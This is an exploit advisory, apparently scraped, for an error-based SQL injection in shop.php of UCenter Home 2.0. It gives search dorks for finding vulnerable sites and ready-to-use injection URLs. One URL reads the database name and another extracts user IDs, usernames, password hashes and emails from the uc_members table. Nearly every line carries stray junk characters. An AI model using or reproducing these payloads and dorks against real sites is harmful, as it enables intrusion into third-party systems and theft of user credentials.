* h, }& Y* ^+ H3 E }2 Q__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ ( T& u( W: {* n7 K# y
4 c4 h# l" j; U* V
7 k7 C. E3 k- h/ A) w6 `
0 W4 K& z% z3 S4 W*/ Author : KnocKout # q1 P5 x5 J+ O
7 C' h8 z8 x. Y* |
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers 6 c* y$ W6 d5 \
3 q; g$ F+ i( M4 s! J$ W/ i, ~
*/ Contact: knockoutr@msn.com 0 m2 t# O9 f+ Y8 `& z
# r: |# {% O9 M. k6 z2 p7 i2 G
*/ Cyber-Warrior.org/CWKnocKout
9 S% M% H. y4 _0 A, J6 e& N/ y$ k- v
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== * I7 ^% L+ q, X% ^) Q( m% U
+ \9 p+ Z! D4 v% j3 U* tScript : UCenter Home
& l* S9 F% i: ~; D+ ?
5 r1 T+ u4 H: RVersion : 2.0
& g' q& z" W' n! P8 U" N
6 y, u. i) o6 [$ sScript HomePage : http://u.discuz.net/ 7 U4 u, ]5 E; V' \) m: w# p
1 d2 t* Y% T3 Y3 f; l/ q1 o
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
" g3 ` n& C( P3 R& ]- }; c( v
5 Z% _" _# E% t" V- o" n+ l2 FDork : Powered by UCenter inurl:shop.php?ac=view " t# R, ~" w% ?# ^, s4 G
3 K* s' |; P2 E; l" X7 p) E0 y
Dork 2 : inurl:shop.php?ac=view&shopid=
1 u3 Z: |" O( t B3 M, f# Q
) D+ M9 h# O8 a& |0 C! N9 l__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 2 S8 L9 h1 ]9 E1 S' n$ `4 Y
2 q6 X2 ^; F. N5 ZVuln file : Shop.php * R9 E0 g8 q) z
# \& s8 Z5 o' ^value's : (?)ac=view&shopid= ( [; |2 `1 l: W( p* w. s4 V, R
1 w4 k9 j, _% p: j. BVulnerable Style : SQL Injection (MySQL Error Based) / P3 ~1 a( H5 {5 O3 m8 X+ J
# H2 c8 q' w. H) y
Need Metarials : Hex Conversion ) [! {/ M- ^+ _( \6 o. k% E
2 l! |# g! H& j: d
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== * p9 K; ]0 W% t
2 Y8 }4 p+ b7 z+ v" t ]% v. v
Your Need victim Database name.
8 w2 B- Y- J0 h3 C% ]; x/ h" G' |7 S6 R; k6 ~
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
6 f( {" n* x- P: E* a6 n6 u* G7 B& y6 t' Q1 ], v; R
..
9 y, e! k+ F- W9 J
; ]" \( D( j- v) ^/ @! |9 jDB : Okey.
( `+ M: H" Q0 E" d
/ P& @; D3 \" e/ O: H0 @your edit DB `[TARGET DB NAME]` ) _) L, ]5 I2 T. e
% {9 S( u4 m; K8 ? N
Example : 'hiwir1_ucenter'
- i+ W0 C: Y1 e+ V! \# c
) ]* k9 p8 v) D, J; FEdit : Okey. " R! ?8 V6 {% z& p0 J
0 W+ y8 g; T o' x! u
Your use Hex conversion. And edit Your SQL Injection Exploit.. ) e+ ]; V$ P/ E0 x2 _
% r: p. r* s8 B1 t! h
7 x7 f# F5 G# P: a+ X) F5 [- ?% g" I" p* c& i" h
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
U6 R! P# K( m8 |' O! H |